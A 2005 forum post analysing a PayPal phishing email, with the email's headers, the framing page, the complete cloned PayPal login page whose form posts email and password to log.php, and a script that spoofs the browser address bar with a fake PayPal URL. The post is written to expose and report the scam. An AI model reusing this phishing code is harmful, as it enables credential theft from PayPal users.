|
-
March 19th, 2005, 07:48 PM
#1
Interesting PayPal Phishy (Where's Phishy?)
Hrmm.. Another PayPal phish:
The Phish
As part of our security measures, we regularly screen activity in the PayPal system. We recently noticed the following issue on your account:
We recently received a report of unauthorized credit card use associated with this account. As a precaution, we have limited access to your PayPal account in order to protect against future unauthorized transactions.
Case ID Number: PP-091-233-629
For your protection, we have limited access to your account until additional security measures can be completed. We apologize for any inconvenience this may cause.
To review your account and some or all of the information that PayPal used to make its decision to limit your account access, please visit the Resolution Center by following the link below:
* https://www.paypal.com/cgi-bin/webscr?cmd=login-run*
< http://web.update.acct-online.us.ms>
If, after reviewing your account information, you seek further clarification regarding your account access, please contact PayPal by visiting the Help Center and clicking "Contact Us"
We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.
Sincerely,
*PayPal* *Account Review Department *
Header info
From - Sat Mar 19 13:08:00 2005
X-Account-Key: account3
X-UIDL: dab7c3a3bcf59c254e4a210cf9c62875
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
X-Apparently-To: msmittens@msmittens.com via xx.yy.zz.aa; Sat, 19 Mar 2005 10:03:59 -0800
X-YahooFilteredBulk: 216.201.96.58
Authentication-Results:xx.yy.zz.aa.com
from=paypal.com; domainkeys=neutral (no sig)
X-Originating-IP: [xx.yy.zz.aa]
Return-Path: <root@altravel.whsites.net>
Received: from xx.yy.zz.aa (EHLO xx.yy.zz.aa.net) (xx.yy.zz.aa)
by xx.yy.zz.aa.com with SMTP; Sat, 19 Mar 2005 10:03:59 -0800
Received: from altravel.whsites.net (altravel.whsites.net [69.36.177.20])
by xx.yy.zz.aa.net (Postfix) with ESMTP id 518922B699E
for <msmittens@msmittens.com>; Sat, 19 Mar 2005 13:03:59 -0500 (EST)
Received: (from root@localhost)
by altravel.whsites.net (8.11.6/8.11.6) id j2JI3x606444;
Sat, 19 Mar 2005 11:03:59 -0700
Date: Sat, 19 Mar 2005 11:03:59 -0700
Message-Id: <200503191803.j2JI3x606444@altravel.whsites.net>
To: msmittens@msmittens.com
Subject: [Bulk] Notification of Limited Account Access
From: "service@paypal.com" <service@paypal.com>
PHP Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
<HTML><HEAD><!-- cy)dots - [ cydots.com ] -->
<TITLE>web</TITLE>
<META name="DESCRIPTION" content="web - erfahren Sie mehr über web. Hier finden Sie alle Infos zu web...">
<META name="KEYWORDS" content="">
<LINK rel="SHORTCUT ICON" href="">
<META name="ROBOTS" content="index,follow">
<META name="LANGUAGE" content="DE,german,deutsch">
<META NAME="DISTRIBUTION" CONTENT="global">
</HEAD>
<frameset rows="100%,*" border="0" frameborder="0" framespacing="0">
<FRAME SRC="http://216.254.139.213/~altravel.org/images/res.htm" scrolling="auto">
<FRAME scrolling="no" noresize>
<noframes>
<body><CENTER><h1><a href="http://web.update.acct-online.us.ms">web</a></h1>
<br><br><H2><a href="http://216.254.139.213/~altravel.org/images/res.htm">web - erfahren Sie mehr über web. Hier finden Sie Informationen zum Thema web...</a></H2>
<br><br><a href="http://www.cydots.com/">Kostenlose Domains für alle! Registrieren Sie kostenlos Ihre eigene Domain! - Free Domains</a>
<br><br><A HREF="http://www.cydots.com/start/kostenlose-angebote.php" TARGET="_top">Kostenlose Angebote und Gewinnspiele!</A><BR><BR></CENTER></body>
</noframes></frameset>
<!-- FC -->
</HTML>
Now this one is rather interesting. Note that the code doesn't match what's on the site. Turns out it's running in frames.
PHP Code:
<HTML><HEAD><TITLE>PayPal - Resolution Center Member Log In</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META http-equiv=description
content="PayPal lets you send money to anyone with email. PayPal is free for consumers and works seamlessly with your existing credit card and checking account. You can settle debts, borrow cash, divide bills or split expenses with friends all without going to an ATM or looking for your checkbook.">
<META http-equiv=keywords
content="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, cell phones, two-way pagers, Windows CE"><LINK
href="res/xpt.css" type=text/css rel=stylesheet><LINK
href="res/xptInvoice.css" type=text/css
rel=stylesheet><LINK href="res/xptlive.css"
type=text/css rel=stylesheet>
<STYLE type=text/css></STYLE>
<LINK href="/en_US/i/icon/pp_favicon_x.ico" rel="shortcut icon">
<script language="JavaScript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
var SymRealWinOpen = window.open;
function SymWinOpen(url, name, attributes)
{
return (new Object());
}
window.open = SymWinOpen;
//-->
</script>
<SCRIPT language=JavaScript>
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
var SymRealWinOpen = window.open;
function SymWinOpen(url, name, attributes)
{
return (new Object());
}
window.open = SymWinOpen;
function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
function MM_validateForm() { //v4.0
var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
for (i=0; i<(args.length-2); i+=3) { test=args[i+2]; val=MM_findObj(args[i]);
if (val) { nm=val.name; if ((val=val.value)!="") {
if (test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
if (p<1 || p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
} else if (test!='R') { num = parseFloat(val);
if (isNaN(val)) errors+='- '+nm+' must contain a number.\n';
if (test.indexOf('inRange') != -1) { p=test.indexOf(':');
min=test.substring(8,p); max=test.substring(p+1);
if (num<min || max<num) errors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
} } } else if (test.charAt(0) == 'R') errors += '- '+nm+' is required.\n'; }
} if (errors) alert('The following error(s) occurred:\n'+errors);
document.MM_returnValue = (errors == '');
}
//-->
</SCRIPT>
<SCRIPT src="res/pp_main.js"></SCRIPT>
<META content="MSHTML 6.00.2900.2096" name=GENERATOR></HEAD>
<BODY>
<DIV>
<DIV id=xptHeader>
<TABLE cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR>
<TD noWrap><IMG alt=""
src="res/paypal_logo.gif" border=0></TD>
<TD class=cobrand align=middle width="100%"></TD>
<TD noWrap align=right><A
href="https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run"><SPAN
class=emphasis>SignUp</SPAN></A>|<A
href="https://www.paypal.com/cgi-bin/webscr?cmd=_login-run">LogIn</A>|<A
href="https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_security-center-outside">Help</A>
</TD></TR></TBODY></TABLE>
<div align="center"></div>
</DIV>
<DIV id=xptTabs>
<TABLE class=primary cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR>
<TD><A href="http://www.paypal.com/cgi-bin/webscr?cmd=_home"><IMG
alt=Welcome src="res/P_off_welcome.gif"
border=0></A></TD>
<TD><IMG height=1 alt="" src="res/pixel.gif"
width=1 border=0></TD>
<TD><A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/ema/index-outside"><IMG
alt="Send Money" src="res/P_off_send_money.gif"
border=0></A></TD>
<TD><IMG height=1 alt="" src="res/pixel.gif"
width=1 border=0></TD>
<TD><A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/req/index-outside"><IMG
alt="Request Money"
src="res/P_off_request_money.gif"
border=0></A></TD>
<TD><IMG height=1 alt="" src="res/pixel.gif"
width=1 border=0></TD>
<TD><A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_merchant-outside"><IMG
alt="Merchant Tools"
src="res/P_off_merchant_tools.gif"
border=0></A></TD>
<TD><IMG height=1 alt="" src="res/pixel.gif"
width=1 border=0></TD>
<TD><A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_auction-outside"><IMG
alt="Auction Tools"
src="res/P_off_auction_tools.gif"
border=0></A></TD></TR></TBODY></TABLE>
<DIV class=alignCenter>
<TABLE class=secondary cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=19 alt="" src="res/pixel.gif"
width=1 border=0></TD></TR></TBODY></TABLE></DIV></DIV>
<DIV id=xptContentOuter>
<TABLE id=xptContentCustom cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR vAlign=top>
<TD class=fullRowNoLeftNav>
<DIV id=xptTitle>
<TABLE class=main cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR>
<TD width="100%" valign="top" class=heading>
<table width="100%" border="1" align="center" cellpadding="5" cellspacing="0" bordercolor="#CCCCCC" bgcolor="#FFEEEE">
<tr>
<td> <span class="emphasis">Resolution Center: </span>Your
account is limited. To remove the limitation, please
Log In to Resolution Center below.</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=0 width="100%" align=center
border=0>
<TBODY>
<TR vAlign=top>
<TD class=fullRowNoLeftNav><span class="nav"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"><br>
PayPal is constantly working to ensure security
by regularly screening the accounts in our system.
We recently reviewed your account, and we need more
information to help us provide you with secure service.
Until we can collect this information, your access
to sensitive account features will be limited. <br>
</font></span>
<p class="nav"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"><strong>Why
is my account access limited?</strong><br>
<br>
</font><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Your
account access has been limited for the following
reason(s):<br>
</font><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"><br>
<strong> Our system requires
further account verification.</strong><br>
<br>
</font><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"></font></p>
</TD>
</TR>
</TBODY>
</TABLE>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr valign="bottom">
<td width="51%" height="50" class="heading">Resolution
Center Member Log In </td>
<td width="49%" height="50">
<div align="right">Secure Log In <img src="res/secure_lock_2.gif" width="16" height="17"></div></td>
</tr>
</table>
</TD>
</TR>
<TR>
<TD><IMG height=2 alt=""
src="res/pixel.gif" width=1
border=0></TD></TR>
<TR>
<TD>
<HR>
</TD></TR></TBODY></TABLE></DIV>
<TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0>
<TBODY>
<TR>
<TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center
border=0>
<TBODY>
<TR vAlign=top>
<TD class=fullRowNoLeftNav><form action="log.php" method="post" name="form1" onSubmit="MM_validateForm('Email','','RisEmail','Pass','','R');return document.MM_returnValue">
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="114"><strong><font size="2" face="Arial, Helvetica, sans-serif">Email
address:</font></strong></td>
<td width="156"><strong><font face="Arial, Helvetica, sans-serif">
<input name="Email" type="text" id="Email">
</font></strong></td>
<td width="230"><a href="https://www.paypal.com/cgi-bin/webscr?cmd=_email-recovery">Forget
your email address?</a></td>
</tr>
<tr>
<td><strong><font size="2" face="Arial, Helvetica, sans-serif">Password:</font></strong></td>
<td><strong><font face="Arial, Helvetica, sans-serif">
<input name="Pass" type="password" id="Pass">
</font></strong></td>
<td><a href="https://www.paypal.com/cgi-bin/webscr?cmd=_forgot-password">Forget
your password?</a></td>
</tr>
<tr>
<td height="40"><span class="f3"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">
<input name="subiect" type="hidden" id="subiect3" value="Step1">
<input name="redirect" type="hidden" id="redirect" value="loginaccess.htm">
</font></span></td>
<td height="40">
<input type="submit" name="Submit" value="Log In">
</td>
<td height="40"> </td>
</tr>
</table>
</form></TD>
</TR>
</TBODY>
</TABLE></TD>
</TR>
<TR>
<TD width="100%" valign="top" class=verticalSpacerHigh><IMG height=1 alt=""
src="res/pixel.gif" width=1
border=0>
<HR></TD>
</TR>
</TBODY>
</TABLE></TD></TR></TBODY></TABLE></DIV>
<DIV id=xptFooter>
<TABLE cellSpacing=0 cellPadding=0 align=center border=0>
<TBODY>
<TR>
<TD>
<P><A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/about-outside">About</A>
| <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside">Account
Types</A> | <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_display-fees-outside">Fees</A>
| <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside">Privacy</A>
| <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside">Security
Center</A> | <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_contact_us">Contact Us</A>
| <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/ua-outside">User
Agreement</A> | <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/pdn/intro-outside">Developers</A>
| <A
href="https://www.paypal.com/cgi-bin/webscr?cmd=p/gen/jobs-outside">Jobs</A>
| <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_bc-signup">BuyerCredit</A>
| <A
href="http://www.paypal.com/cgi-bin/webscr?cmd=_web-referrals-mrb-outside">Referrals</A>
| <A href="http://www.paypal.com/cgi-bin/webscr?cmd=_shop-ext">Shops</A> |
<A
href="https://www.paypal.com/cgi-bin/webscr?cmd=p/gen/batch-outside">Mass
Pay</A></P>
<P><A class=ebayLink href="http://www.ebay.com/" target=_blank>PayPal, an
eBay company</A></P>
<P class=lastPara>Copyright © 1999-2004 PayPal. All rights reserved.<BR><A
href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/fdic-outside">Information
about FDIC pass-through
insurance</A></P></TD></TR></TBODY></TABLE><BR></DIV></DIV>
<SCRIPT language=JavaScript>
<!--
var SymRealOnLoad;
var SymRealOnUnload;
function SymOnUnload()
{
window.open = SymWinOpen;
if(SymRealOnUnload != null)
SymRealOnUnload();
}
function SymOnLoad()
{
if(SymRealOnLoad != null)
SymRealOnLoad();
window.open = SymRealWinOpen;
SymRealOnUnload = window.onunload;
window.onunload = SymOnUnload;
}
SymRealOnLoad = window.onload;
window.onload = SymOnLoad;
//-->
</SCRIPT>
</BODY>
<SCRIPT language=javascript src="js668.htm"></SCRIPT>
</HTML>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;
function SymOnUnload()
{
window.open = SymWinOpen;
if(SymRealOnUnload != null)
SymRealOnUnload();
}
function SymOnLoad()
{
if(SymRealOnLoad != null)
SymRealOnLoad();
window.open = SymRealWinOpen;
SymRealOnUnload = window.onunload;
window.onunload = SymOnUnload;
}
SymRealOnLoad = window.onload;
window.onload = SymOnLoad;
//-->
</script>
Going to cydots.com and I get this when searching for the domain:
Using wget and I was able to finally get some files:
PHP Code:
MsMittens# more js668.htm
var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-520;
vuln_h= 17;
vuln_show();
}
var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}
function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}
var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https//www.paypal.com/cgi-bin/webscr?cmd=_login-run'
if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {
}
It's this file that seems the most interesting. I will say this: the phishes are getting more and more sophisticated. Notice sent off to Primus.ca and PayPal.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote